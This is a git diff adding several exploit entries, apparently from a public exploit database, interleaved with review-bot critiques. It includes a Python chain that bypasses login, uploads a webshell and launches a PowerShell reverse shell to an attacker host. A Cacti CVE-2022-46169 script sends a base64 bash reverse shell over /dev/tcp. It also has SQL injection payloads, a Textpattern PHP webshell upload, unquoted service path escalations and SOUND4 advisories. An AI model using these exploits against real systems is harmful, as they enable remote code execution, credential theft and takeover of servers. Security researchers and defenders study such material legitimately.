to /uploads directory +def check_file(args,cookie): + uploads_endpoint = f"{args.target}/uploads/" + cookies = {'PHPSESSID': f'{cookie}'} + req = requests.get(uploads_endpoint,verify=False,cookies=cookies) + soup = BeautifulSoup(req.text,features='html.parser') + files = soup.find_all("a") + for i in range (len(files)): + match = re.search(".*-shelljudgesystem\.php",files[i].get('href')) + if match: + file = files[i].get('href') + print(F.CYAN+"[+] The webshell is at the following Url: "+f"{args.target}/uploads/"+file) + return file + + + return None + +def file_upload(args,cookie): + now = int(time.time()) + endpoint = f"{args.target}/edit_organizer.php" + cookies = {'wp-settings-time-1':f"{now}",'PHPSESSID': f'{cookie}'} + get_req = requests.get(endpoint,verify=False,cookies=cookies) + soup = BeautifulSoup(get_req.text,features='html.parser') + username = soup.find("input",{"name":"username"}).get('value') + admin_password = soup.find("input",{"id":"password"}).get('value') + print(F.GREEN + "[+] Admin username: " + username) + print(F.GREEN + "[+] Admin password: " + admin_password) + + + # Multi-part request + file_dict = { + 'fname':(None,"Random"), + 'mname':(None,"Random"), + 'lname':(None,"Random"), + 'email':(None,"ranom@mail.com"), + 'pnum':(None,"014564343"), + 'cname':(None,"Random"), + 'caddress':(None,"Random"), + 'ctelephone':(None,"928928392"), + 'cemail':(None,"company@mail.com"), + 'cwebsite':(None,"http://company.com"), + 'file':("shelljudgesystem.php","","application/octet-stream"), + 'username':(None,f"{admin_password}"), + 'passwordx':(None,f"{admin_password}"), + 'password2x':(None,f"{admin_password}"), + 'password':(None,f"{admin_password}"), + 'update':(None,"") + } + + req = requests.post(endpoint,verify=False,cookies=cookies,files=file_dict) + + +def exploit(args,cookie,file): + payload = 
f"""powershell+-nop+-c+"$client+%3d+New-Object+System.Net.Sockets.TCPClient('{args.listenip}',{args.listenport})%3b"""+"""$stream+%3d+$client.GetStream()%3b[byte[]]$bytes+%3d+0..65535|%25{0}%3bwhile(($i+%3d+$stream.Read($bytes,+0,+$bytes.Length))+-ne+0){%3b$data+%3d+(New-Object+-TypeName+System.Text.ASCIIEncoding).GetString($bytes,0,+$i)%3b$sendback+%3d+(iex+$data+2>%261+|+Out-String+)%3b$sendback2+%3d+$sendback+%2b+'PS+'+%2b+(pwd).Path+%2b+'>+'%3b$sendbyte+%3d+([text.encoding]%3a%3aASCII).GetBytes($sendback2)%3b$stream.Write($sendbyte,0,$sendbyte.Length)%3b$stream.Flush()}%3b$client.Close()" """ + uploads_endpoint = f"{args.target}/uploads/{file}?cmd={payload}" + cookies = {'PHPSESSID': f'{cookie}'} + print(F.GREEN + "\n[+] Enjoy your reverse shell ") + requests.get(uploads_endpoint,verify=False,cookies=cookies) + + + +if __name__ == '__main__': + print(F.CYAN + BANNER) + args = argsetup() + cookie=auth_bypass(args=args) + file_upload(args=args,cookie=cookie) + file_name=check_file(args=args,cookie=cookie) + if file_name is not None: + exploit(args=args,cookie=cookie,file=file_name) + + else: + print(F.RED + "[!] File not found") \ No newline at end of file diff --git a/exploits/php/webapps/51165.txt b/exploits/php/webapps/51165.txt new file mode 100644 index 000000000..232adc26c --- /dev/null +++ b/exploits/php/webapps/51165.txt 
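Review bot: In `file_upload()` the multipart field `'username':(None,f"{admin_password}")` sends the recovered password where the username belongs, so running this PoC rewrites the organizer account's username to its password value — a destructive side effect the surrounding code does not intend (the real value was just scraped into `username`) and the header does not warn about. `auth_bypass()` reads `login.cookies['PHPSESSID']` without checking that a session cookie was returned, so against a patched target the script dies with a `KeyError` instead of reporting that the bypass failed. The header also lists no CVE and no remediation; since the companion entry 51165.txt names `login.php` as the vulnerable file, a line pointing the vendor at prepared statements and a server-side extension allow-list for `edit_organizer.php` uploads would make the entry actionable.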
@@ -0,0 +1,36 @@
+# Exploit Title: Judging Management System v1.0 - Authentication Bypass
+# Date: 12/11/2022
+# Exploit Author: Angelo Pio Amirante
+# Vendor Homepage: https://www.sourcecodester.com/
+# Software Link: https://www.sourcecodester.com/php/15910/judging-management-system-using-php-and-mysql-free-source-code.html
+# Version: 1.0
+# Tested on: Windows 10 on XAAMP server
+
+# Vulnerability: An attacker can bypass login page and access to dashboard page
+# Vulnerable file: login.php
+# Exploit:
+
+1) Go to: http://localhost/php-jms/index.php
+2) As username use this payload: 'or 1=1-- -
+3) Use random words for password
+
+
+POST /php-jms/login.php HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:107.0) Gecko/20100101 Firefox/107.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 37
+Origin: http://localhost
+Connection: close
+Referer: http://localhost/php-jms/index.php
+Cookie: wp-settings-time-1=1669938282; _pk_id.1.1fff=9c7644c9d84f46f1.1670232782.
+Upgrade-Insecure-Requests: 1
+Sec-Fetch-Dest: document
+Sec-Fetch-Mode: navigate
+Sec-Fetch-Site: same-origin
+Sec-Fetch-User: ?1
+
+username=%27or+1%3D1--+-&password=asa
\ No newline at end of file
diff --git a/exploits/php/webapps/51166.py b/exploits/php/webapps/51166.py
new file mode 100755
index 000000000..3f493dd65
--- /dev/null
+++ b/exploits/php/webapps/51166.py
@@ -0,0 +1,69 @@
+# Exploit Title: Cacti v1.2.22 - Remote Command Execution (RCE)
+# Exploit Author: Riadh BOUCHAHOUA
+# Discovery Date: 2022-12-08
+# Vendor Homepage: https://www.cacti.net/
+# Software Links : https://github.com/Cacti/cacti
+# Tested Version: 1.2.2x <= 1.2.22
+# CVE: CVE-2022-46169
+# Tested on OS: Debian 10/11
+
+#!/usr/bin/env python3
+import random
+import httpx, urllib
+
+class Exploit:
+ def __init__(self, url, proxy=None, rs_host="",rs_port=""):
+ self.url = url
+ self.session = httpx.Client(headers={"User-Agent": self.random_user_agent()},verify=False,proxies=proxy)
+ self.rs_host = rs_host
+ self.rs_port = rs_port
+
+ def exploit(self):
+ # cacti local ip from the url for the X-Forwarded-For header
+ local_cacti_ip = self.url.split("//")[1].split("/")[0]
+
+ headers = {
+ 'X-Forwarded-For': f'{local_cacti_ip}'
+ }
+
+ revshell = f"bash -c 'exec bash -i &>/dev/tcp/{self.rs_host}/{self.rs_port} <&1'"
+ import base64
+ b64_revshell = base64.b64encode(revshell.encode()).decode()
+ payload = f";echo {b64_revshell} | base64 -d | bash -"
+ payload = urllib.parse.quote(payload)
+ urls = []
+
+ # Adjust the range to fit your needs ( wider the range, longer the script will take to run the more success you will have achieving a reverse shell)
+ for host_id in range(1,100):
+ for local_data_ids in range(1,100):
+ urls.append(f"{self.url}/remote_agent.php?action=polldata&local_data_ids[]={local_data_ids}&host_id={host_id}&poller_id=1{payload}")
+
+ for url in urls:
+ r = self.session.get(url,headers=headers)
+ print(f"{r.status_code} - {r.text}" )
+ pass
+
+ def random_user_agent(self):
+ ua_list = [
+ "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36",
+ "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0",
+ ]
+ return random.choice(ua_list)
+
+def parse_args():
+ import argparse
+
+ argparser = argparse.ArgumentParser()
+ argparser.add_argument("-u", "--url", help="Target URL (e.g. http://192.168.1.100/cacti)")
+ argparser.add_argument("-p", "--remote_port", help="reverse shell port to connect to", required=True)
+ argparser.add_argument("-i", "--remote_ip", help="reverse shell IP to connect to", required=True)
+ return argparser.parse_args()
+
+def main() -> None:
+ # Open a nc listener (rs_host+rs_port) and run the script against a CACTI server with its LOCAL IP URL
+ args = parse_args()
+ e = Exploit(args.url, rs_host=args.remote_ip, rs_port=args.remote_port)
+ e.exploit()
+
+if __name__ == "__main__":
+ main()
\ No newline at end of file
diff --git a/exploits/php/webapps/51175.txt b/exploits/php/webapps/51175.txt
new file mode 100644
index 000000000..2aba333b5
--- /dev/null
+++ b/exploits/php/webapps/51175.txt
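Review bot: `parse_args()` marks `-p/--remote_port` and `-i/--remote_ip` as `required=True` but not `-u/--url`, so invoking the script without a URL gets past `Exploit.__init__` and then fails inside `exploit()` at `self.url.split("//")[1]` with an `AttributeError` on `None` instead of a usage message; the `--url` argument should carry `required=True` like the other two. `import base64` is placed inside `exploit()` while `random` and `httpx` are imported at module level, and the stray `pass` after the request loop is dead code. `proxies=proxy` in `httpx.Client(...)` should be checked against the installed httpx, which has deprecated that keyword in favour of `proxy=` in recent releases (inferred, not visible on the page). For detection, the loop's traffic has a clear signature an operator can alert on: bursts of `remote_agent.php?action=polldata` requests whose `X-Forwarded-For` equals the server's own address and whose `poller_id` carries a `base64 -d | bash` string; the affected range is given as `1.2.2x <= 1.2.22` under CVE-2022-46169.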
@@ -0,0 +1,56 @@ +## Exploit Title: Bangresto 1.0 - SQL Injection +## Exploit Author: nu11secur1ty +## Date: 12.16.2022 +## Vendor: https://axcora.com/, https://www.hockeycomputindo.com/2021/05/restaurant-pos-source-code-free.html +## Demo: https://axcora.my.id/bangrestoapp/start.php +## Software: https://github.com/mesinkasir/bangresto +## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/Bangresto + +## Description: +The `itemID` parameter appears to be vulnerable to SQL injection attacks. +The payload ' was submitted in the itemID parameter, and a database +error message was returned. +The attacker can be stooling all information from the database of this +application. + +## STATUS: CRITICAL Vulnerability + +[+] Payload: + +```MySQL +--- +Parameter: itemID (GET) + Type: error-based + Title: MySQL >= 5.1 error-based - Parameter replace (UPDATEXML) + Payload: itemID=(UPDATEXML(2539,CONCAT(0x2e,0x7171767871,(SELECT +(ELT(2539=2539,1))),0x7170706a71),2327))&menuID=1 +--- +``` + +## Reproduce: +[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/Bangresto) + +## Proof and Exploit: +[href](https://streamable.com/moapnd) + +## Time spent +`00:30:00` + +System Administrator - Infrastructure Engineer +Penetration Testing Engineer +Exploit developer at +https://packetstormsecurity.com/https://cve.mitre.org/index.html and +https://www.exploit-db.com/ +home page: https://www.nu11secur1ty.com/ +hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= + nu11secur1ty + + +-- +System Administrator - Infrastructure Engineer +Penetration Testing Engineer +Exploit developer at https://packetstormsecurity.com/ +https://cve.mitre.org/index.html and https://www.exploit-db.com/ +home page: https://www.nu11secur1ty.com/ +hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= + nu11secur1ty \ No newline at end of file diff --git a/exploits/php/webapps/51176.txt b/exploits/php/webapps/51176.txt new file mode 100644 index 000000000..35ee8ac59 --- /dev/null 
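Review bot: The advisory never names the script that receives `itemID` — the payload block only shows `itemID=(UPDATEXML(...))&menuID=1` — so a reader cannot tell which Bangresto 1.0 endpoint to test or patch; add the request line of the actual request (path and method) above the payload. `stooling` in the description should read `stealing`. The payload is sqlmap output, so stating the sqlmap command used and noting that the error-based technique relies on MySQL error messages being echoed into the page would make the finding reproducible and tell the vendor what to fix (parameterize the `itemID` query and stop printing database errors).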
+++ b/exploits/php/webapps/51176.txt 
@@ -0,0 +1,132 @@ +# Exploit Title: Textpattern 4.8.8 - Remote Code Execution (RCE) (Authenticated) +# Exploit Author: Alperen Ergel +# Contact: @alpernae (IG/TW) +# Software Homepage: https://textpattern.com/ +# Version : 4.8.8 +# Tested on: windows 11 xammp | Kali linux +# Category: WebApp +# Google Dork: intext:"Published with Textpattern CMS" +# Date: 10/09/2022 +# +######## Description ######## +# +# Step 1: Login admin account and go settings of site +# Step 2: Upload a file to web site and selecet the rce.php +# Step3 : Upload your webshell that's it... +# +######## Proof of Concept ######## + + +========>>> START REQUEST <<<========= + + + + +############# POST REQUEST (FILE UPLOAD) ############################## (1) + +POST /textpattern/index.php?event=file HTTP/1.1 +Host: localhost +Content-Length: 1038 +sec-ch-ua: "Chromium";v="105", "Not)A;Brand";v="8" +Accept: text/javascript, application/javascript, application/ecmascript, application/x-ecmascript, */*; q=0.01 +Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryMgUEFltFdqBVvdJu +X-Requested-With: XMLHttpRequest +sec-ch-ua-mobile: ?0 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36 +sec-ch-ua-platform: "Windows" +Origin: http://localhost +Sec-Fetch-Site: same-origin +Sec-Fetch-Mode: cors +Sec-Fetch-Dest: empty +Referer: http://localhost/textpattern/index.php?event=file +Accept-Encoding: gzip, deflate +Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7 +Cookie: txp_login=admin%2C94d754006b895d61d9ce16cf55165bbf; txp_login_public=4353608be0admin +Connection: close + +------WebKitFormBoundaryMgUEFltFdqBVvdJu +Content-Disposition: form-data; name="fileInputOrder" + +1/1 +------WebKitFormBoundaryMgUEFltFdqBVvdJu +Content-Disposition: form-data; name="app_mode" + +async +------WebKitFormBoundaryMgUEFltFdqBVvdJu +Content-Disposition: form-data; name="MAX_FILE_SIZE" + +2000000 
+------WebKitFormBoundaryMgUEFltFdqBVvdJu +Content-Disposition: form-data; name="event" + +file +------WebKitFormBoundaryMgUEFltFdqBVvdJu +Content-Disposition: form-data; name="step" + +file_insert +------WebKitFormBoundaryMgUEFltFdqBVvdJu +Content-Disposition: form-data; name="id" + + +------WebKitFormBoundaryMgUEFltFdqBVvdJu +Content-Disposition: form-data; name="_txp_token" + +16ea3b64ca6379aee9599586dae73a5d +------WebKitFormBoundaryMgUEFltFdqBVvdJu +Content-Disposition: form-data; name="thefile[]"; filename="rce.php" +Content-Type: application/octet-stream + +"; $cmd = ($_REQUEST['cmd']); system($cmd); echo ""; die; }?> +------WebKitFormBoundaryMgUEFltFdqBVvdJu-- + + +############ POST RESPONSE (FILE UPLOAD) ######### (1) + +HTTP/1.1 200 OK +Date: Sat, 10 Sep 2022 15:28:57 GMT +Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/8.1.6 +X-Powered-By: PHP/8.1.6 +X-Textpattern-Runtime: 35.38 ms +X-Textpattern-Querytime: 9.55 ms +X-Textpattern-Queries: 16 +X-Textpattern-Memory: 2893 kB +Content-Length: 270 +Connection: close +Content-Type: text/javascript; charset=utf-8 + +___________________________________________________________________________________________________________________________________________________ + +############ REQUEST TO THE PAYLOAD ############################### (2) + +GET /files/c.php?cmd=whoami HTTP/1.1 +Host: localhost +sec-ch-ua: "Chromium";v="105", "Not)A;Brand";v="8" +sec-ch-ua-mobile: ?0 +sec-ch-ua-platform: "Windows" +Upgrade-Insecure-Requests: 1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 +Sec-Fetch-Site: none +Sec-Fetch-Mode: navigate +Sec-Fetch-User: ?1 +Sec-Fetch-Dest: document +Accept-Encoding: gzip, deflate +Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7 +Cookie: txp_login_public=4353608be0admin 
+Connection: close + + +############ RESPONSE THE PAYLOAD ############################### (2) + +HTTP/1.1 200 OK +Date: Sat, 10 Sep 2022 15:33:06 GMT +Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/8.1.6 +X-Powered-By: PHP/8.1.6 +Content-Length: 29 +Connection: close +Content-Type: text/html; charset=UTF-8 + +
alpernae\alperen
+
+ +========>>> END REQUEST <<<========= \ No newline at end of file diff --git a/exploits/windows/local/51159.txt b/exploits/windows/local/51159.txt new file mode 100644 index 000000000..a053be466 --- /dev/null +++ b/exploits/windows/local/51159.txt @@ -0,0 +1,32 @@ +# Exploit Title: CoolerMaster MasterPlus 1.8.5 - 'MPService' Unquoted Service Path +# Date: 11/17/2022 +# Exploit Author: Damian Semon Jr (Blue Team Alpha) +# Version: 1.8.5 +# Vendor Homepage: https://masterplus.coolermaster.com/ +# Software Link: https://masterplus.coolermaster.com/ +# Tested on: Windows 10 64x + +# Step to discover the unquoted service path: +wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """ + +CoolerMaster MasterPlus Technology Service MPService C:\Program Files (x86)\CoolerMaster\MasterPlus\MPService.exe Auto + +# Info on the service: +C:\>sc qc MPService +[SC] QueryServiceConfig SUCCESS + +SERVICE_NAME: MPService + TYPE : 10 WIN32_OWN_PROCESS + START_TYPE : 2 AUTO_START + ERROR_CONTROL : 1 NORMAL + BINARY_PATH_NAME : C:\Program Files (x86)\CoolerMaster\MasterPlus\MPService.exe + LOAD_ORDER_GROUP : + TAG : 0 + DISPLAY_NAME : CoolerMaster MasterPlus Technology Service + DEPENDENCIES : + SERVICE_START_NAME : LocalSystem + + +#Exploit: +A successful exploit of this vulnerability could allow a threat actor to execute code during startup or reboot with System privileges. Drop payload "Program.exe" in C:\ and restart service or computer to trigger. +Ex: (C:\Program.exe) \ No newline at end of file diff --git a/exploits/windows/local/51167.txt b/exploits/windows/local/51167.txt new file mode 100644 index 000000000..1716a60ca --- /dev/null +++ b/exploits/windows/local/51167.txt 
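Review bot: The upload request sends the webshell as `filename="rce.php"` but request (2) fetches `/files/c.php`, so the two halves of the PoC do not match and the reader cannot tell under which name the file was stored; use one name in both requests, or state that the file was renamed in the Files panel between the steps. The opening `<?php` tag of the uploaded body appears to have been lost in this listing — only `"; $cmd = ($_REQUEST['cmd']); system($cmd); echo ""; die; }?>` survives — so the payload should be restated in full. `_txp_token`, the `txp_login` cookie and the multipart boundary are session-specific and need a sentence saying they must be replaced with the attacker's own values. Since an authenticated admin session is required, the actual weakness is that the Files panel accepts a `.php` upload into the web-served `/files/` directory; the remediation worth stating is to deny script execution under `/files/` in the web-server configuration, not only to upgrade past 4.8.8.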
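Review bot: The exploit step `Drop payload "Program.exe" in C:\` glosses over the precondition that makes this exploitable: with the path shown, Windows tries `C:\Program.exe` and then `C:\Program Files.exe` before the real binary, and both live in the root of `C:\`, which standard users cannot write to by default. Add the ACL check (`icacls C:\`) to the evidence and state that this is only a privilege escalation when that directory has been made writable; otherwise it is a hardening finding. Likewise 'restart service' needs service-control rights a low-privileged user normally lacks, so a reboot is the realistic trigger. The `sc qc` output does show `SERVICE_START_NAME : LocalSystem`, which is what makes the payoff SYSTEM-level once the path is hijacked and is worth calling out explicitly.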
@@ -0,0 +1,61 @@ +# Exploit Title: SOUND4 Server Service 4.1.102 - Local Privilege Escalation +# Exploit Author: LiquidWorm + +Vendor: SOUND4 Ltd. +Product web page: https://www.sound4.com | https://www.sound4.biz +Affected version: 4.1.102 + +Summary: SOUND4 Windows Server Service. + +Desc: The application suffers from an unquoted search path issue impacting +the service 'SOUND4 Server' for Windows. This could potentially allow an +authorized but non-privileged local user to execute arbitrary code with +elevated privileges on the system. A successful attempt would require the +local user to be able to insert their code in the system root path undetected +by the OS or other security applications where it could potentially be executed +during application startup or reboot. If successful, the local user's code +would execute with the elevated privileges of the application. + +Tested on: Windows 10 Home 64 bit (build 9200) + SOUND4 Server v4.1.102 + SOUND4 Remote Control v4.3.17 + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic +Macedonian Information Security Research and Development Laboratory +Zero Science Lab - https://www.zeroscience.mk - @zeroscience + + +Advisory ID: ZSL-2022-5721 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5721.php + + +26.09.2022 + +-- + + +C:\>sc qc "SOUND4 Server" +[SC] QueryServiceConfig SUCCESS + +SERVICE_NAME: SOUND4 Server + TYPE : 10 WIN32_OWN_PROCESS + START_TYPE : 2 AUTO_START + ERROR_CONTROL : 1 NORMAL + BINARY_PATH_NAME : C:\Program Files\SOUND4\Server\SOUND4 Server.exe --service + LOAD_ORDER_GROUP : + TAG : 0 + DISPLAY_NAME : SOUND4 Server + DEPENDENCIES : + SERVICE_START_NAME : LocalSystem + +C:\>cacls "C:\Program Files\SOUND4\Server\SOUND4 Server.exe" +C:\Program Files\SOUND4\Server\SOUND4 Server.exe NT AUTHORITY\SYSTEM:(ID)F + BUILTIN\Administrators:(ID)F + BUILTIN\Users:(ID)R + APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(ID)R + APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED 
APPLICATION PACKAGES:(ID)R + + +C:\Program Files\SOUND4\Server>"SOUND4 Server.exe" -V +4.1.102 \ No newline at end of file diff --git a/exploits/windows/local/51168.txt b/exploits/windows/local/51168.txt new file mode 100644 index 000000000..03b39092c --- /dev/null +++ b/exploits/windows/local/51168.txt 
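Review bot: The `cacls` output near the end of the hunk shows the ACL of `SOUND4 Server.exe` itself, but that is not the file an attacker would plant: with `C:\Program Files\SOUND4\Server\SOUND4 Server.exe --service` unquoted, the candidates tried first are `C:\Program.exe` and `C:\Program Files\SOUND4\Server\SOUND4.exe`, so the relevant evidence is write access to `C:\` and to the `C:\Program Files\SOUND4\Server` directory. Add `icacls "C:\Program Files\SOUND4\Server"` to the listing; if it shows only `BUILTIN\Users:(ID)R` like the executable does, the finding is a hardening issue rather than a working local privilege escalation on a default install. The description's 'insert their code in the system root path' should name those two candidate paths explicitly so the vendor knows what to quote and what to lock down.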
@@ -0,0 +1,69 @@ +# Exploit Title: SOUND4 IMPACT/FIRST/PULSE/Eco v2.x - Cross-Site Request Forgery +# Exploit Author: LiquidWorm + +Vendor: SOUND4 Ltd. +Product web page: https://www.sound4.com | https://www.sound4.biz +Affected version: FM/HD Radio Processing: + Impact/Pulse/First (Version 2: 1.1/2.15) + Impact/Pulse/First (Version 1: 2.1/1.69) + Impact/Pulse Eco 1.16 + Voice Processing: + BigVoice4 1.2 + BigVoice2 1.30 + Web-Audio Streaming: + Stream 1.1/2.4.29 + Watermarking: + WM2 (Kantar Media) 1.11 + +Summary: The SOUND4 IMPACT introduces an innovative process - mono and +stereo parts of the signal are processed separately to obtain perfect +consistency in terms of both sound and level. Therefore, in moving +reception, when the FM receiver switches from stereo to mono and back to +stereo, the sound variations and changes in level are reduced by over 90%. +In the SOUND4 IMPACT processing chain, the stereo expander can be used +substantially without any limitations. + +With its advanced functionalities and impressive versatility, SOUND4 +PULSE gives clients the ultimate price - performance ratio, providing +much more than just a processor. Flexible and powerful, it ensures perfect +sound quality and full compatibility with radio broadcasting standards +and can be used simultaneously for FM and HD, DAB, DRM or streaming. + +SOUND4 FIRST provides all the most important functionalities you need +in an FM/HD processor and sets the bar high both in terms of performance +and affordability. Designed to deliver a sound of uncompromising quality, +this tool gives you 2-band processing, a digital stereo generator and an +IMPACT Clipper. + +Desc: The application interface allows users to perform certain actions +via HTTP requests without performing any validity checks to verify the +requests. This can be exploited to perform certain actions with administrative +privileges if a logged-in user visits a malicious web site. 
+ +Tested on: Apache/2.4.25 (Unix) + OpenSSL/1.0.2k + PHP/7.1.1 + GNU/Linux 5.10.43 (armv7l) + GNU/Linux 4.9.228 (armv7l) + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic +Macedonian Information Security Research and Development Laboratory +Zero Science Lab - https://www.zeroscience.mk - @zeroscience + + +Advisory ID: ZSL-2022-5722 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5722.php + + +26.09.2022 + +-- + + +PoC: +---- + +
+ +
\ No newline at end of file diff --git a/exploits/windows/local/51169.txt b/exploits/windows/local/51169.txt new file mode 100644 index 000000000..96e5e9728 --- /dev/null +++ b/exploits/windows/local/51169.txt 
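Review bot: The description says 'certain actions' can be performed without validity checks but never names an endpoint or parameter, and the section under `PoC:` is empty in this listing (the HTML form appears to have been lost), so the finding cannot be verified or regression-tested from the text. Name the state-changing request the form submits — its path, method and posted fields — in the description, and say whether it is a missing per-request token, a missing `Origin`/`Referer` check, or both. A one-line expected result (what changes on the device when the logged-in user opens the page) would also let a tester confirm the fix.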
@@ -0,0 +1,165 @@ +# Exploit Title: SOUND4 IMPACT/FIRST/PULSE/Eco v2.x - Authorization Bypass (IDOR) +# Exploit Author: LiquidWorm + +Vendor: SOUND4 Ltd. +Product web page: https://www.sound4.com | https://www.sound4.biz +Affected version: FM/HD Radio Processing: + Impact/Pulse/First (Version 2: 1.1/2.15) + Impact/Pulse/First (Version 1: 2.1/1.69) + Impact/Pulse Eco 1.16 + Voice Processing: + BigVoice4 1.2 + BigVoice2 1.30 + Web-Audio Streaming: + Stream 1.1/2.4.29 + Watermarking: + WM2 (Kantar Media) 1.11 + +Summary: The SOUND4 IMPACT introduces an innovative process - mono and +stereo parts of the signal are processed separately to obtain perfect +consistency in terms of both sound and level. Therefore, in moving +reception, when the FM receiver switches from stereo to mono and back to +stereo, the sound variations and changes in level are reduced by over 90%. +In the SOUND4 IMPACT processing chain, the stereo expander can be used +substantially without any limitations. + +With its advanced functionalities and impressive versatility, SOUND4 +PULSE gives clients the ultimate price - performance ratio, providing +much more than just a processor. Flexible and powerful, it ensures perfect +sound quality and full compatibility with radio broadcasting standards +and can be used simultaneously for FM and HD, DAB, DRM or streaming. + +SOUND4 FIRST provides all the most important functionalities you need +in an FM/HD processor and sets the bar high both in terms of performance +and affordability. Designed to deliver a sound of uncompromising quality, +this tool gives you 2-band processing, a digital stereo generator and an +IMPACT Clipper. + +Desc: The application is vulnerable to insecure direct object references +that occur when the application provides direct access to objects based +on user-supplied input. As a result of this vulnerability attackers can +bypass authorization and access the hidden resources on the system and +execute privileged functionalities. 
+ +Tested on: Apache/2.4.25 (Unix) + OpenSSL/1.0.2k + PHP/7.1.1 + GNU/Linux 5.10.43 (armv7l) + GNU/Linux 4.9.228 (armv7l) + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic +Macedonian Information Security Research and Development Laboratory +Zero Science Lab - https://www.zeroscience.mk - @zeroscience + + +Advisory ID: ZSL-2022-5723 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5723.php + + +26.09.2022 + +-- + + +(GET|POST) /** HTTP/1.1 + +/var/www/: +---------- + +.SOUND4 +about.php +actioninprogress.php +broken_error.php +cfg_filewatch.xml +cfg_filewatch_specific.xml +checklogin.php +checkserver.php +config.php +datahandlerdlg.php +descrxml.php +dns.php +downloads +downloads.php +fullrebootsystem.php +global.php +globaljs.php +guifactorysettings.xml +guixml.php +guixml_error.php +header.php +images +index.php +isreboot.php +jquery-3.2.1.min.js +jquery-plugins +jquery-ui-custom +jquery-ui-i18n.js +jquery-ui.css +jquery-ui.js +jquery.js +jquery.ui.touch-punch.min.js +killffmpeg.php +linkandshare.php +login.php +logout.php +monitor.php +networkdiagnostic.php +partialrebootsystem.php +ping.php +playercfg.xml +rebootsystem.php +restoreinprogress.php +script.min.js +secure.php +serverinprogress.php +settings.php +setup.php +setup_ethernet.php +style.min.css +traceroute.php +upgrade +upgrade.php +upgradeinprogress.php +uploaded_guicustomload.php +uploaded_kantarlic.php +uploaded_licfile.php +uploaded_logo.php +uploaded_presetfile.php +uploaded_restorefile.php +uploaded_upgfile.php +validate_tz.php +ws.min.js +ws.php +wsjquery-class.min.js +www-data-handler.php + +/usr/cgi-bin/: +-------------- + +(GET|POST) /** HTTP/1.1 + +backup.cgi +cgi-form-data +downloadkantarlic.cgi +ffmpeg.cgi +frontpanel +getlogs.cgi +getlogszip.cgi +guicustomsettings.cgi +guicustomsettingsload.cgi +guifactorysettings.cgi +importpreset.cgi +loghandler.php +logo +logoremove.cgi +logoupload.cgi +phptail.php +printenv +printenv.vbs +printenv.wsf +restore.cgi 
+restorefactory.cgi +test-cgi +upgrade.cgi +upload.cgi \ No newline at end of file diff --git a/exploits/windows/local/51170.txt b/exploits/windows/local/51170.txt new file mode 100644 index 000000000..253171577 --- /dev/null +++ b/exploits/windows/local/51170.txt 
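Review bot: The PoC under `(GET|POST) /** HTTP/1.1` is a directory listing of `/var/www/` and `/usr/cgi-bin/`, not a request, so it does not show which script returns privileged content without a session check; pick one state-changing handler from the list (one of the `uploaded_*.php` scripts or a `*.cgi`) and show the unauthenticated request together with its response. `/usr/cgi-bin/` also contains `printenv`, `printenv.vbs`, `printenv.wsf` and `test-cgi`, which look like the stock Apache sample CGIs; if they are reachable they disclose the CGI environment and should be removed regardless of the authorization bug, which is worth a sentence of its own. The 'insecure direct object references' label fits poorly with a blanket 'every script is reachable' claim — 'missing authentication on all endpoints' would be the more precise description if that is what was found.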
@@ -0,0 +1,74 @@ +# Exploit Title: SOUND4 IMPACT/FIRST/PULSE/Eco v2.x - Denial Of Service (DoS) +# Exploit Author: LiquidWorm + +Vendor: SOUND4 Ltd. +Product web page: https://www.sound4.com | https://www.sound4.biz +Affected version: FM/HD Radio Processing: + Impact/Pulse/First (Version 2: 1.1/2.15) + Impact/Pulse/First (Version 1: 2.1/1.69) + Impact/Pulse Eco 1.16 + Voice Processing: + BigVoice4 1.2 + BigVoice2 1.30 + Web-Audio Streaming: + Stream 1.1/2.4.29 + Watermarking: + WM2 (Kantar Media) 1.11 + +Summary: The SOUND4 IMPACT introduces an innovative process - mono and +stereo parts of the signal are processed separately to obtain perfect +consistency in terms of both sound and level. Therefore, in moving +reception, when the FM receiver switches from stereo to mono and back to +stereo, the sound variations and changes in level are reduced by over 90%. +In the SOUND4 IMPACT processing chain, the stereo expander can be used +substantially without any limitations. + +With its advanced functionalities and impressive versatility, SOUND4 +PULSE gives clients the ultimate price - performance ratio, providing +much more than just a processor. Flexible and powerful, it ensures perfect +sound quality and full compatibility with radio broadcasting standards +and can be used simultaneously for FM and HD, DAB, DRM or streaming. + +SOUND4 FIRST provides all the most important functionalities you need +in an FM/HD processor and sets the 